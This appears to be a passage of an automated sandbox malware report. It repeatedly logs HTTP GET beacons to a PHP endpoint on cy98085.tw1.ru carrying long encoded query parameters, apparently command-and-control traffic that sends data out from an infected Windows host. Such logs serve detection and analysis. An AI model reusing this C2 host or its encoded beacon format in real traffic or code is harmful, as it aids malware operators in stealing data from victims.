            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ru
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ru
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ru
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ru
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ru
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ru
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=d1nIiojI0ADO1IWN4UmYhJmNxMjZzYGMjBzYzATMxM2N0QGZyUmIsICNxQWMjR2MlJWOxMWM4AzNzIDN5ImMjJ2Y5UWOyITYzEWN4AzY5IzNiojI1ATZyIGNmJjM0IWZ0QGMiZmM4UzMldzY3ATY4QTY2UjIsIiM1UDOmBzNhZ2NxgTN3YzMmBDZlFjM0UWM2IjM4E2YiZGNhVGM4gTMiojI3cTMhNmZmBjYjJWZwMWYxMmZ4ETNmBzM5UGOxcjZ4MmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2apJ2M50mYyVzVW9WQpJ2M50mYyVzVWl2bqlEbxcVWPZlRVRkSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFSKNETptGbJZTSpJGcxckWC5EWhl2dplUavpWSIZURWl2dplEMs1WUnFlaOdWVyMGcKh0Y5Z1RkVnVFl0dFRUS6R2MitWNXFGWKl2TplEWadVNXFGWKNET5oUehlXOXdlZkhlWPlzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUanpmT3FkaMBzYUx0cNpWT4NmaMdXUqlkNJlXW2hXbJNXS5VlVKl2TptmbjBTNXRmdO1WSzlUehlXOXd1ZjhlWPpUaPlGNyIGckdlW5p0QMl2ctNmdsZUSzYVbUl2bqlUNShVYqp0QMlWV65UdNpWT4RTaOBDND9UavpWS3xWbJdDcqlkda1mYKJEWTl2dplUeWdlW1xmMaVnVtlkNJNlW0ZUbUlnVyMmVKNETpdGVOlXSq5UMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQDM4UjY1gTZiFmY2EzMmNjZwMGMjNDMxEzY3QDZkJTZiwiIhlzMzMGOwgjY5ETOlJmMwgjZwEmNhRzYilTZlNTM3czN0IjNmFTNhJiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W HTTP/1.1Accept: */*Content-Type: text/csvUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: cy98085.tw1.ru
            Source: global trafficHTTP traffic detected: GET /d08a562e.php?yQ3XIlbSUpXqy1hW=xAqVQRf3SN3DgEtr&eLjFvqzMP7WkiU=gUm2mIi8Xe0XiOxko8YWVwYCU&71b8053f92a6f3b969e0cc7eb346bdc8=QN3QjMlFGZ2IzYkFTO3QGOkBDMzMDMmVWZwYTOmVWOldjMlJWM0kjYzQjM3ATO5cDNxIzNwIzM&e14aa04c57d43a589b010571fdc09bbd=QNlVmN0UjNyMzMwAjYkRmNwQ2N2ETN1QmNwMGOxQzN2EzYiZTZidTY&b7a037ad6fe109de1e3df73ac3f17891=d1nI0EDZxMGZzUmY5EzYxgDM3MjM0kjYyMmYjlTZ5IjMhNTY1gDMjljM3IiOiUDMlJjY0YmMyQjYlRDZwImZygTNzU2NjdDMhhDNhZTNiwiIyUTN4YGM3EmZ3EDO1cjNzYGMkVWMyQTZxYjMygTYjJmZ0EWZwgDOxIiOiczNxE2YmZGMiNmYlBzYhFzYmhTM1YGMzkTZ4EzNmhzYis3W&1897097195362e5524f24dd6cd4188d9=QX9JiI6ICNwgTNiVDOlJWYiZTMzY2MmBzYwM2MwETMjdDNkRmMlJCLiQTMkFzYkNTZilTMjFDOwczMyQTOiJzYiNWOlljMyE2MhVDOwMWOycjI6ISNwUmMiRjZyIDN